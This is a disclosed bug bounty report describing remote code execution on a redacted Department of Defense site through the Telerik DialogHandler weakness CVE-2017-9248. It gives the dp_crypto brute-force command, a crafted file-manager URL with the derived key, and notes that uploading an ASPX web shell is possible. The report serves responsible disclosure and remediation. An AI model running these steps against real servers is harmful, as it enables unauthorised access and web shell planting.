U.S. Dept Of Defense: RCE on https://█████/ Using CVE-2017-9248

2019-02-06T02:15:44
ID H1:491668
Type hackerone
Reporter warsong
Modified 2019-10-10T19:12:25

Description

Summary: https://█████████/ is hosting an unpatched version of the Telerik DialogHandler Telerik.Web.UI.DialogHandler.aspx allowing for the machine key to be brute forced. The machine key can be used to access the DNN file manager to upload arbitrary files including ASPX giving a web shell and RCE.

Description: Telerik has a known cryptographic weakness in older versions of the Dialog Handler which when exploited can be used to brute force the machine key and gain access to the DNN file manager. The file manager allows for ASPX shell upload and RCE.

Step-by-step Reproduction Instructions Hit https://███/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx and notice the handler dialog message. Download https://github.com/bao7uo/dp_crypto to make brute force simple and run: python dp_crypto.py -k https://███████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx 88 all 21

Wait for the script to finish and the key will be integrated into a link to the file manager for DNN. You can use this link to upload arbitrary files to DNN. I uploaded a PNG for proof but ASPX works just as well here. I had to do a little trial and error on this one, it uses the ASCII character set and figuring out a key length of 88 took a little doing but going longer than the real key causes the base64 to start validating again from the beginning so in a test of 128 key length I was able to see the key repeat at the 89th position.

https://████████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=HBJ/KxQ5LRscHB8ELSgfLDIsMUYUZxs2HAchCS1mEEYfLTllLCoDGwJaCCszEhxzF2YULSsCIUsCLDY+Nj0MQQAoIiMtEyFyGBMbTixmJQIAPgBPAwYIVRcoMi8fA2QeFxMDWhUSAzkIMwdcGAMYcCwtMQAvExNZNhc5dxYTLQ0XOS09HRMYOilnA3IaKB9EFC0yPgY9YFkXOCIFFhMUPRcGIgMCdBwDGyIpCzNje1YbAgxzLBwYBBsMGwAVFiYNHS05RBRKJhQbPV9DAWULWQsMC1ouAhcfKSIIKzI4fzkBdgQ8KxIcQgMpHBMfBypFFFofex8QGAEvOBMTLHcDci8tIRQLFm9RFAMEMSwDYA0BAQtZLQ0fFh0vBEMbeAB0FD4TNBcMLWMxEzlGFhMHMCw9IisEZyZ1F2MuAhYSMUsUORM/Hi4QRQMvPTUCABgKL2cbEix3OQIUIjkIM2MIbBcdGCwBEQ8fLwwfXQMBEAkeWxNAL3ccBi0HXkktZhNMA2Z4RSsDAwIpLBg+M2YQMxd3ADwZDSVGFD9RLzA9DEEfBhwxLHY5NAAWIk0YXTlYKUspEDUWVUcCAxg6KQMABAAHKVAtEhxPBC0PRh1kPg8tWykILwNwYDBnF1ouBy0wFD0iPQsGPTkBdQwtLQ0HXQFaMnM2LQ9LLwYcMR0DAC8vEmwULQEXXCk9DAsDPHtOLXcfMAAXIkAZAxdEFXYHEgtZHEMfXQw2LVgyCQMXPVQELhMAGSgPOR0+LhILAjIvLl06NwMuG0EXPRwxCFoLXhcGNjcuHD43L2dhDxx3OVwvPVIWBxlRShQQfysvAwAEHykXQix3BAkcKDFnHwEQPxkGDzEtEwMAHAIpURl0OUYbBgw1NQMAGxheFC4dPyUEGi0QFDEsNWooIwAjAgFZdRQ4YCkrZxxNKDIbNTBgdw8ZEQQUKRIlLwMQE2QZdQtLBj0tWy93BDcbBCUgGGctBwU6LQMVdQ8/GwQUJgYQOjQUaD10GAM5aR0yMhAEPS1IHj4AIy0DIjIZOxcTA1oEARktGzo0FAwIAA0iDiw4E0QZHD0CFXQUAAcFB1sedhBwGQY2AioCNWwEPgNaLREPDRkvFAQEAhgbHl4YLRl1fHwZBgw0BD0QSyksIisuLi5zGQIlPSxmOWwbLiUoAxRoRBopLggsEWUOGBAQBh4SKQkzWC1+KWcydS8yJQkUAgtZMBMXWisDOQEvAyIACAIyORdjIT8DABNZLCIqKw==

https://████/GSP.png

Product, Version, and Configuration (If applicable) Telerik <= 2017.1.118

Suggested Mitigation/Remediation Actions Patch Telerik or switch to a different editor like CKEditor.

Impact

Critical: Exploitation allows for a web shell, defacement, etc through arbitrary unrestricted file uploads.